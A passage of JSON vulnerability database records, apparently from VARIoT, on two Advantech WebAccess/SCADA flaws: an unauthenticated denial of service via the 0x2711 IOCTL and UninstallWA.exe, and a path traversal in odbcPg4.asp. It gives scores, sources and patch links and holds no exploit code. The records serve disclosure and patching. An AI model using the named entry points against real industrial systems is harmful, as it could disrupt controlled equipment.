"ZDI-19-331" }, { "db": "CNVD", "id": "CNVD-2019-08947" }, { "db": "BID", "id": "107675" }, { "db": "JVNDB", "id": "JVNDB-2019-003119" }, { "db": "NVD", "id": "CVE-2019-6554" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-003119" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-331" } ], "trust": 0.7 }, "cve": "CVE-2019-6554", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2019-6554", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 7.1, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CNVD-2019-08947", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 7.1, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-157989", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2019-6554", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2019-6554", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2019-6554", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-6554", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2019-6554", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2019-6554", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2019-08947", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201904-094", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-157989", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c" }, { "db": "ZDI", "id": "ZDI-19-331" }, { "db": "CNVD", "id": "CNVD-2019-08947" }, { "db": "VULHUB", "id": "VHN-157989" }, { "db": "JVNDB", "id": "JVNDB-2019-003119" }, { "db": "CNNVD", "id": "CNNVD-201904-094" }, { "db": "NVD", "id": "CVE-2019-6554" } ] }, "description": { "_id": null, "data": "Advantech WebAccess/SCADA, Versions 8.3.5 and prior. An improper access control vulnerability may allow an attacker to cause a denial-of-service condition. Advantech WebAccess/SCADA Contains an access control vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within UninstallWA.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following vulnerabilities:\n1. Multiple command-injection vulnerabilities\n2. A denial-of-service vulnerability\n3. Multiple stack-based buffer-overflow vulnerabilities\nAn attacker can exploit these issues to inject and execute arbitrary commands in the context of the application. Failed exploit attempts will result in denial-of-service conditions", "sources": [ { "db": "NVD", "id": "CVE-2019-6554" }, { "db": "JVNDB", "id": "JVNDB-2019-003119" }, { "db": "ZDI", "id": "ZDI-19-331" }, { "db": "CNVD", "id": "CNVD-2019-08947" }, { "db": "BID", "id": "107675" }, { "db": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c" }, { "db": "VULHUB", "id": "VHN-157989" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2019-6554", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-19-092-01", "trust": 3.4 }, { "db": "ZDI", "id": "ZDI-19-331", "trust": 1.3 }, { "db": "CNNVD", "id": "CNNVD-201904-094", "trust": 0.9 }, { "db": "BID", "id": "107675", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-08947", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-003119", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7908", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.1113", "trust": 0.6 }, { "db": "IVD", "id": "6A9BB3F5-E6BE-4DC2-9D2B-57459A62BF8C", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-157989", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c" }, { "db": "ZDI", "id": "ZDI-19-331" }, { "db": "CNVD", "id": "CNVD-2019-08947" }, { "db": "VULHUB", "id": "VHN-157989" }, { "db": "BID", "id": "107675" }, { "db": "JVNDB", "id": "JVNDB-2019-003119" }, { "db": "CNNVD", "id": "CNNVD-201904-094" }, { "db": "NVD", "id": "CVE-2019-6554" } ] }, "id": "VAR-201904-0184", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c" }, { "db": "CNVD", "id": "CNVD-2019-08947" }, { "db": "VULHUB", "id": "VHN-157989" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c" }, { "db": "CNVD", "id": "CNVD-2019-08947" } ] }, "last_update_date": "2024-11-23T22:17:06.371000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" }, { "title": "Advantech WebAccess/SCADA Patch for Incorrect Access Control Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/157947" }, { "title": "Advantech WebAccess and Advantech WebAccess/SCADA Fixes for access control error vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=91017" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-331" }, { "db": "CNVD", "id": "CNVD-2019-08947" }, { "db": "JVNDB", "id": "JVNDB-2019-003119" }, { "db": "CNNVD", "id": "CNNVD-201904-094" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-284", "trust": 1.9 }, { "problemtype": "NVD-CWE-Other", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-157989" }, { "db": "JVNDB", "id": "JVNDB-2019-003119" }, { "db": "NVD", "id": "CVE-2019-6554" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-092-01" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6554" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/107675" }, { "trust": 0.9, "url": "https://www.advantech.com/" }, { "trust": 0.9, "url": "https://support.advantech.com/support/downloadsrdetail_new.aspx?sr_id=1-ms9mjv\u0026doc_source=download" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-6554" }, { "trust": 0.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-331/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/78318" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-331" }, { "db": "CNVD", "id": "CNVD-2019-08947" }, { "db": "VULHUB", "id": "VHN-157989" }, { "db": "BID", "id": "107675" }, { "db": "JVNDB", "id": "JVNDB-2019-003119" }, { "db": "CNNVD", "id": "CNNVD-201904-094" }, { "db": "NVD", "id": "CVE-2019-6554" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c", "ident": null }, { "db": "ZDI", "id": "ZDI-19-331", "ident": null }, { "db": "CNVD", "id": "CNVD-2019-08947", "ident": null }, { "db": "VULHUB", "id": "VHN-157989", "ident": null }, { "db": "BID", "id": "107675", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2019-003119", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201904-094", "ident": null }, { "db": "NVD", "id": "CVE-2019-6554", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-04-03T00:00:00", "db": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-331", "ident": null }, { "date": "2019-04-03T00:00:00", "db": "CNVD", "id": "CNVD-2019-08947", "ident": null }, { "date": "2019-04-05T00:00:00", "db": "VULHUB", "id": "VHN-157989", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "BID", "id": "107675", "ident": null }, { "date": "2019-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003119", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-094", "ident": null }, { "date": "2019-04-05T19:29:00.407000", "db": "NVD", "id": "CVE-2019-6554", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-331", "ident": null }, { "date": "2019-04-03T00:00:00", "db": "CNVD", "id": "CNVD-2019-08947", "ident": null }, { "date": "2020-10-16T00:00:00", "db": "VULHUB", "id": "VHN-157989", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "BID", "id": "107675", "ident": null }, { "date": "2019-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003119", "ident": null }, { "date": "2020-10-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-094", "ident": null }, { "date": "2024-11-21T04:46:41.090000", "db": "NVD", "id": "CVE-2019-6554", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201904-094" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess/SCADA Incorrect access control vulnerability", "sources": [ { "db": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c" }, { "db": "CNVD", "id": "CNVD-2019-08947" } ], "trust": 0.8 }, "type": { "_id": null, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201904-094" } ], "trust": 0.6 } }
var-201705-3745
Vulnerability from variot
An Absolute Path Traversal issue was discovered in Advantech WebAccess Version 8.1 and prior. The absolute path traversal vulnerability has been identified, which may allow an attacker to traverse the file system to access restricted files or directories. Advantech WebAccess Contains a path traversal vulnerability.Information is obtained and service operation is interrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to cause a denial of service condition on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability.The specific flaw exists within odbcPg4.asp. An attacker can leverage this vulnerability to overwrite key web files which will disable functionality on the target machine. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A directory traversal vulnerability exists in Advantech WebAccess due to the application's failure to adequately filter user-supplied input. A remote attacker exploited the vulnerability to retrieve sensitive information and execute arbitrary code through a specially crafted request with a directory traversal sequence ('../'). This may aid in further attacks. Advantech WebAccess version 8.1 and prior are vulnerable
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201705-3745", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.1" }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess 8.2 20170330", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e" }, { "db": "ZDI", "id": "ZDI-17-322" }, { "db": "CNVD", "id": "CNVD-2017-06980" }, { "db": "BID", "id": "98311" }, { "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "db": "CNNVD", "id": "CNNVD-201704-931" }, { "db": "NVD", "id": "CVE-2017-7929" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-003931" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Zhou Yu", "sources": [ { "db": "ZDI", "id": "ZDI-17-322" } ], "trust": 0.7 }, "cve": "CVE-2017-7929", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2017-7929", "impactScore": 4.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 6.8, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "CVE-2017-7929", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CNVD-2017-06980", "impactScore": 4.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e", "impactScore": 4.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-116132", "impactScore": 4.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "exploitabilityScore": 2.8, "id": "CVE-2017-7929", "impactScore": 4.2, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-7929", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-7929", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2017-7929", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2017-06980", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201704-931", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-116132", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e" }, { "db": "ZDI", "id": "ZDI-17-322" }, { "db": "CNVD", "id": "CNVD-2017-06980" }, { "db": "VULHUB", "id": "VHN-116132" }, { "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "db": "CNNVD", "id": "CNNVD-201704-931" }, { "db": "NVD", "id": "CVE-2017-7929" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Absolute Path Traversal issue was discovered in Advantech WebAccess Version 8.1 and prior. The absolute path traversal vulnerability has been identified, which may allow an attacker to traverse the file system to access restricted files or directories. Advantech WebAccess Contains a path traversal vulnerability.Information is obtained and service operation is interrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to cause a denial of service condition on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability.The specific flaw exists within odbcPg4.asp. An attacker can leverage this vulnerability to overwrite key web files which will disable functionality on the target machine. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A directory traversal vulnerability exists in Advantech WebAccess due to the application\u0027s failure to adequately filter user-supplied input. A remote attacker exploited the vulnerability to retrieve sensitive information and execute arbitrary code through a specially crafted request with a directory traversal sequence (\u0027../\u0027). This may aid in further attacks. \nAdvantech WebAccess version 8.1 and prior are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-7929" }, { "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "db": "ZDI", "id": "ZDI-17-322" }, { "db": "CNVD", "id": "CNVD-2017-06980" }, { "db": "BID", "id": "98311" }, { "db": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e" }, { "db": "VULHUB", "id": "VHN-116132" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-7929", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-17-124-03", "trust": 2.8 }, { "db": "BID", "id": "98311", "trust": 2.6 }, { "db": "CNNVD", "id": "CNNVD-201704-931", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-06980", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-003931", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4013", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-322", "trust": 0.7 }, { "db": "IVD", "id": "72B8F504-9FAF-4E5E-9287-87F7CB248C3E", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-116132", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e" }, { "db": "ZDI", "id": "ZDI-17-322" }, { "db": "CNVD", "id": "CNVD-2017-06980" }, { "db": "VULHUB", "id": "VHN-116132" }, { "db": "BID", "id": "98311" }, { "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "db": "CNNVD", "id": "CNNVD-201704-931" }, { "db": "NVD", "id": "CVE-2017-7929" } ] }, "id": "VAR-201705-3745", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e" }, { "db": "CNVD", "id": "CNVD-2017-06980" }, { "db": "VULHUB", "id": "VHN-116132" } ], "trust": 1.438782045 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e" }, { "db": "CNVD", "id": "CNVD-2017-06980" } ] }, "last_update_date": "2024-11-23T22:07:25.876000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-124-03" }, { "title": "Patch for Advantech WebAccess Directory Traversal Vulnerability (CNVD-2017-06980)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/93984" }, { "title": "Advantech WebAccess Repair measures for path traversal vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=99746" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-322" }, { "db": "CNVD", "id": "CNVD-2017-06980" }, { "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "db": "CNNVD", "id": "CNNVD-201704-931" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.9 }, { "problemtype": "CWE-36", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-116132" }, { "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "db": "NVD", "id": "CVE-2017-7929" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.5, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-124-03" }, { "trust": 2.3, "url": "http://www.securityfocus.com/bid/98311" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7929" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7929" }, { "trust": 0.3, "url": "http://www.advantech.in/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-322" }, { "db": "CNVD", "id": "CNVD-2017-06980" }, { "db": "VULHUB", "id": "VHN-116132" }, { "db": "BID", "id": "98311" }, { "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "db": "CNNVD", "id": "CNNVD-201704-931" }, { "db": "NVD", "id": "CVE-2017-7929" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e" }, { "db": "ZDI", "id": "ZDI-17-322" }, { "db": "CNVD", "id": "CNVD-2017-06980" }, { "db": "VULHUB", "id": "VHN-116132" }, { "db": "BID", "id": "98311" }, { "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "db": "CNNVD", "id": "CNNVD-201704-931" }, { "db": "NVD", "id": "CVE-2017-7929" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-05-19T00:00:00", "db": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e" }, { "date": "2017-05-04T00:00:00", "db": "ZDI", "id": "ZDI-17-322" }, { "date": "2017-05-19T00:00:00", "db": "CNVD", "id": "CNVD-2017-06980" }, { "date": "2017-05-06T00:00:00", "db": "VULHUB", "id": "VHN-116132" }, { "date": "2017-05-04T00:00:00", "db": 